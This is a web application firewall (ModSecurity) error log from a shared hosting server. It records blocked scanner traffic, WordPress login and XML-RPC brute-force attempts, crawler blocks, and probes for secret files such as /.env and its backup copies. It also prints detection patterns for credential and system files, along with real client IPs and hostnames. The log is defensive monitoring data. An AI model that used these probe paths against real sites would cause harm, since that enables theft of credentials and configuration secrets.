[Tue May 26 18:40:24.049923 2026] [security2:error] [pid 1015481:tid 1015648] [client 45.45.237.225:48620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-website-privacy.php"] [unique_id "ahWbwLQIKfWDMlp2INdVkgAAAS8"]
[Tue May 26 18:40:24.049933 2026] [security2:error] [pid 1015481:tid 1015667] [client 45.45.237.225:48570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in"] [uri "/rsm-contact.php"] [unique_id "ahWbwLQIKfWDMlp2INdVlAAAAUI"]
[Tue May 26 18:40:24.050122 2026] [security2:error] [pid 1015481:tid 1015678] [client 45.45.237.225:48712] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "gcirsm.org.in"] [uri "/rsm-website-disclaimer.php"] [unique_id "ahWbwLQIKfWDMlp2INdVlQAAAU0"]
[Tue May 26 18:40:24.050775 2026] [security2:error] [pid 1015481:tid 1015700] [client 45.45.237.225:48282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-regalia.php"] [unique_id "ahWbwLQIKfWDMlp2INdVlwAAAWM"]
[Tue May 26 18:40:24.050915 2026] [security2:error] [pid 1015481:tid 1015690] [client 45.45.237.225:48316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-downloads-annualreports.php"] [unique_id "ahWbwLQIKfWDMlp2INdVmAAAAVk"]
[Tue May 26 18:40:24.051292 2026] [security2:error] [pid 1015481:tid 1015729] [client 45.45.237.225:48294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-contact.php"] [unique_id "ahWbwLQIKfWDMlp2INdVmQAAAYA"]
[Tue May 26 18:40:24.051815 2026] [security2:error] [pid 1015481:tid 1015701] [client 45.45.237.225:48376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gciamd.org.in"] [uri "/amd-website-privacy.php"] [unique_id "ahWbwLQIKfWDMlp2INdVmwAAAWQ"]
[Tue May 26 18:40:24.051844 2026] [security2:error] [pid 1015481:tid 1015706] [client 45.45.237.225:48426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-faq.php"] [unique_id "ahWbwLQIKfWDMlp2INdVmgAAAWk"]
[Tue May 26 18:40:24.051883 2026] [security2:error] [pid 1015481:tid 1015701] [client 45.45.237.225:48376] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "gciamd.org.in"] [uri "/amd-website-privacy.php"] [unique_id "ahWbwLQIKfWDMlp2INdVmwAAAWQ"]
[Tue May 26 18:40:24.052433 2026] [security2:error] [pid 1015481:tid 1015735] [client 45.45.237.225:48352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-website-terms.php"] [unique_id "ahWbwLQIKfWDMlp2INdVnQAAAYY"]
[Tue May 26 18:40:24.052451 2026] [security2:error] [pid 1015481:tid 1015718] [client 45.45.237.225:48338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.237.45.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-website-disclaimer.php"] [unique_id "ahWbwLQIKfWDMlp2INdVnAAAAXU"]
[Tue May 26 18:40:24.355264 2026] [security2:error] [pid 1015481:tid 1015607] [remote 199.247.4.24:45330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWbwLQIKfWDMlp2INdVngABIX0"]
[Tue May 26 18:40:24.668792 2026] [security2:error] [pid 1015481:tid 1015685] [client 78.190.43.26:14308] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-admin/admin-post.php"] [unique_id "ahWbwLQIKfWDMlp2INdVpQABVAk"], referer: https://www.cagmedya.com/wp-admin/edit.php?post_type=page
[Tue May 26 18:40:25.825795 2026] [security2:error] [pid 1015481:tid 1015725] [client 209.141.46.91:59634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.46.141.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.cti.hn"] [uri "/wp-login.php"] [unique_id "ahWbwbQIKfWDMlp2INdVsgAAAXw"]
[Tue May 26 18:40:25.929011 2026] [security2:error] [pid 1015481:tid 1015727] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbwbQIKfWDMlp2INdVuwAAAX4"]
[Tue May 26 18:40:25.962651 2026] [security2:error] [pid 1015481:tid 1015486] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbwbQIKfWDMlp2INdVxAABEQQ"]
[Tue May 26 18:40:25.962797 2026] [security2:error] [pid 1015481:tid 1015618] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbwbQIKfWDMlp2INdVxAABEQQ"]
[Tue May 26 18:40:26.246077 2026] [security2:error] [pid 1015481:tid 1015493] [remote 91.206.200.156:18176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.200.206.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbwbQIKfWDMlp2INdVwAABFAs"]
[Tue May 26 18:40:26.639569 2026] [security2:error] [pid 1015481:tid 1015674] [client 114.119.138.36:62481] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWbwrQIKfWDMlp2INdVzgAAAUk"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2023-09-27
[Tue May 26 18:40:26.656197 2026] [security2:error] [pid 1015481:tid 1015542] [remote 216.73.216.30:53113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWbwrQIKfWDMlp2INdVzwABhjw"]
[Tue May 26 18:40:28.009186 2026] [security2:error] [pid 1015481:tid 1015716] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbw7QIKfWDMlp2INdV5QAAAXM"]
[Tue May 26 18:40:30.904802 2026] [security2:error] [pid 1015481:tid 1015677] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbxrQIKfWDMlp2INdWCAAAAUw"]
[Tue May 26 18:40:31.203432 2026] [security2:error] [pid 1015481:tid 1015570] [remote 47.128.117.0:58098] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/portfolio/minimalistic-art-house/"] [unique_id "ahWbx7QIKfWDMlp2INdWGQABLFg"]
[Tue May 26 18:40:31.973888 2026] [security2:error] [pid 1015481:tid 1015630] [client 157.173.25.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbx7QIKfWDMlp2INdWIAAAAR0"]
[Tue May 26 18:40:32.811165 2026] [security2:error] [pid 1015481:tid 1015648] [client 49.13.164.148:54820] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWbyLQIKfWDMlp2INdWPgAAAS8"], referer: http://ucdc.co.in/
[Tue May 26 18:40:33.386485 2026] [security2:error] [pid 1015481:tid 1015700] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbyLQIKfWDMlp2INdWRAAAAWM"]
[Tue May 26 18:40:33.972390 2026] [security2:error] [pid 1015481:tid 1015717] [client 124.43.5.103:57677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbybQIKfWDMlp2INdWXQAAAXQ"]
[Tue May 26 18:40:33.972514 2026] [security2:error] [pid 1015481:tid 1015717] [client 124.43.5.103:57677] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbybQIKfWDMlp2INdWXQAAAXQ"]
[Tue May 26 18:40:34.601768 2026] [security2:error] [pid 1015481:tid 1015657] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWbyrQIKfWDMlp2INdWbQAAATg"], referer: https://www.bloggertarget.com
[Tue May 26 18:40:36.101475 2026] [security2:error] [pid 1015481:tid 1015655] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWby7QIKfWDMlp2INdWjwAAATY"]
[Tue May 26 18:40:36.231044 2026] [security2:error] [pid 1015481:tid 1015630] [client 172.224.240.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWbzLQIKfWDMlp2INdWmwAAAR0"]
[Tue May 26 18:40:36.729921 2026] [security2:error] [pid 1015481:tid 1015589] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbzLQIKfWDMlp2INdWpwABPWs"]
[Tue May 26 18:40:36.730176 2026] [security2:error] [pid 1015481:tid 1015662] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbzLQIKfWDMlp2INdWpwABPWs"]
[Tue May 26 18:40:37.166605 2026] [security2:error] [pid 1015481:tid 1015727] [client 114.119.137.211:62211] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "amdsi.org.in"] [uri "/amdsi-downloads-forms.php"] [unique_id "ahWbzbQIKfWDMlp2INdWsgAAAX4"], referer: http://amdsi.org.in/
[Tue May 26 18:40:37.428222 2026] [security2:error] [pid 1015481:tid 1015726] [client 85.11.167.19:43554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "aeromodellingconsultants.com"] [uri "/.env"] [unique_id "ahWbzbQIKfWDMlp2INdWtQAAAX0"]
[Tue May 26 18:40:38.359590 2026] [security2:error] [pid 1015481:tid 1015595] [remote 162.241.152.21:55368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbzrQIKfWDMlp2INdWywABg3E"]
[Tue May 26 18:40:38.398723 2026] [security2:error] [pid 1015481:tid 1015721] [client 85.11.167.19:43570] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "aeromodellingconsultants.com"] [uri "/"] [unique_id "ahWbzrQIKfWDMlp2INdW1QAAAXg"]
[Tue May 26 18:40:38.921479 2026] [security2:error] [pid 1015481:tid 1015707] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbzrQIKfWDMlp2INdW2wAAAWo"]
[Tue May 26 18:40:39.099507 2026] [security2:error] [pid 1015481:tid 1015724] [client 85.11.167.19:43574] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "aeromodellingconsultants.glorodavionics.com"] [uri "/.env"] [unique_id "ahWbz7QIKfWDMlp2INdW6AAAAXs"]
[Tue May 26 18:40:39.273736 2026] [security2:error] [pid 1015481:tid 1015484] [remote 178.32.30.56:56078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.30.32.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbz7QIKfWDMlp2INdW5wABZwI"]
[Tue May 26 18:40:40.204145 2026] [security2:error] [pid 1015481:tid 1015641] [client 85.11.167.19:43578] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "aeromodellingconsultants.glorodavionics.com"] [uri "/"] [unique_id "ahWb0LQIKfWDMlp2INdXBgAAASg"]
[Tue May 26 18:40:41.661530 2026] [security2:error] [pid 1015481:tid 1015652] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb0bQIKfWDMlp2INdXHgAAATM"]
[Tue May 26 18:40:41.665327 2026] [security2:error] [pid 1015481:tid 1015527] [remote 216.73.216.30:62370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWb0bQIKfWDMlp2INdXKAABQS0"]
[Tue May 26 18:40:42.128975 2026] [security2:error] [pid 1015481:tid 1015529] [remote 212.224.100.2:34345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWb0bQIKfWDMlp2INdXMwABhy8"]
[Tue May 26 18:40:42.993731 2026] [security2:error] [pid 1015481:tid 1015501] [remote 212.224.100.2:34345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWb0rQIKfWDMlp2INdXSgABeBM"], referer: https://avprealty.com/wp-login.php
[Tue May 26 18:40:43.918113 2026] [security2:error] [pid 1015481:tid 1015662] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb07QIKfWDMlp2INdXWQAAAT0"]
[Tue May 26 18:40:44.495962 2026] [security2:error] [pid 1015481:tid 1015490] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahWb1LQIKfWDMlp2INdXcAABXAg"]
[Tue May 26 18:40:44.697220 2026] [security2:error] [pid 1015481:tid 1015614] [client 124.43.5.103:29079] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb1LQIKfWDMlp2INdXcwAAAQ0"]
[Tue May 26 18:40:44.697411 2026] [security2:error] [pid 1015481:tid 1015614] [client 124.43.5.103:29079] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWb1LQIKfWDMlp2INdXcwAAAQ0"]
[Tue May 26 18:40:46.316183 2026] [security2:error] [pid 1015481:tid 1015667] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb1bQIKfWDMlp2INdXkwAAAUI"]
[Tue May 26 18:40:46.936011 2026] [security2:error] [pid 1015481:tid 1015502] [remote 216.73.216.30:59007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWb1rQIKfWDMlp2INdXoAABeBQ"]
[Tue May 26 18:40:47.232061 2026] [security2:error] [pid 1015481:tid 1015506] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWb17QIKfWDMlp2INdXpgABURg"]
[Tue May 26 18:40:47.232249 2026] [security2:error] [pid 1015481:tid 1015682] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWb17QIKfWDMlp2INdXpgABURg"]
[Tue May 26 18:40:49.269324 2026] [security2:error] [pid 1015481:tid 1015496] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.backup"] [unique_id "ahWb2bQIKfWDMlp2INdXxAABbA4"]
[Tue May 26 18:40:49.607442 2026] [security2:error] [pid 1015481:tid 1015488] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.old"] [unique_id "ahWb2bQIKfWDMlp2INdX1AABUgY"]
[Tue May 26 18:40:49.661955 2026] [security2:error] [pid 1015481:tid 1015586] [remote 92.205.109.21:58900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWb2bQIKfWDMlp2INdXzQABFWg"]
[Tue May 26 18:40:49.770425 2026] [security2:error] [pid 1015481:tid 1015662] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWb2bQIKfWDMlp2INdXyQAAAT0"]
[Tue May 26 18:40:49.927381 2026] [security2:error] [pid 1015481:tid 1015532] [remote 45.148.10.5:16986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.bak"] [unique_id "ahWb2bQIKfWDMlp2INdX3gABHzI"]
